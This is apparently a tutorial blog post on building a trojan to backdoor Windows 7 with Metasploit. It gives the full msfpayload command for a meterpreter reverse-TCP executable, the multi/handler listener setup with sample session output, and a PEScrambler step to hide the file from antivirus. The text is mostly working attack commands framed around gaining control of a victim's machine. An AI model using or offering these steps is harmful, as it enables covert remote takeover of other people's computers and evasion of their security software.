MAKING A TROJAN TO BACKDOOR WINDOWS 7

The msfpayload command is used to generate a variety of payloads for different target systems. If you do not already know, then, a payload is a piece of code that does a very SPECIFIC task on a system as intended by the hacker. For example open a reverse shell or run a vnc program etc. When running an remote exploit for example, you always want to run a payload as well so that the system can come under your control.

so lets start with the msfpayload command and see what can be done.

$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=6666 x > ~/Desktop/trojan.exe

he above command creates a meterpreter payload for windows that uses a reverse tcp connection. Other important parameters mentioned are LHOST ( for local host ip address ) and LPORT (local host port number). The LHOST ip must be the ip address of the hacker's machine that is running metasploit. The ip address and the port number must be reachable from the target machine. Since in reverse tcp, the victim initiates a connection to the hacker machine.

Now this file "trojan.exe" is supposed to run on the victim machine. But not yet. First we have to start a listener on the hacker machine so that it can receive incoming connections from the trojan. To do this enter the msfconsole.

msf > use exploit/multi/handler

msf exploit(handler) > set LHOST 192.168.1.4
LHOST => 192.168.1.4
msf exploit(handler) > set LPORT 6666
LPORT => 6666
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.4:6666
[*] Starting the payload handler...

Now run the trojan.exe on the windows machine. And the msfconsole would give the meterpreter session as soon as connected

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.4:6666
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.4:6666 -> 192.168.1.101:44238) at 2013-03-04 11:12:41 +0530

meterpreter >

Handling antivirus - make the trojan undetectable

The trojan created in the above example would run fine on windows xp and 7 if there are no uptodate antivirus on them. If there are any antivirus on the system they would detect the payload signature and warn the user. Windows 8 on the other hand comes with inbuilt anti malware protection (Windows defender) which would detect the trojan right away and would not allow the user to run the program.

So we need a way around this to make the trojan undetectable. A utility called PEScrambler can be used to encode the executable file such that antivirus/anti malware cannot detect it. Check it out at THIS LINK :- https://code.google.com/p/pescrambler/

The download contains a single executable file and the usage is straightforward

C:\>PEScrambler.exe -i trojan.exe -o encoded.exe

Now the encoded.exe file is different from trojan.exe and is encoded such that antivirus may not be able to detect it.

At this point of time, most antivirus and antimalwares have become fully aware of the above techniques and it would be very difficult for the trojan to go undetected. Windows 8 inbuilt antimalware detects all such types of payloads generated from msfpayload and encoded with msfencode to whatever iteration level.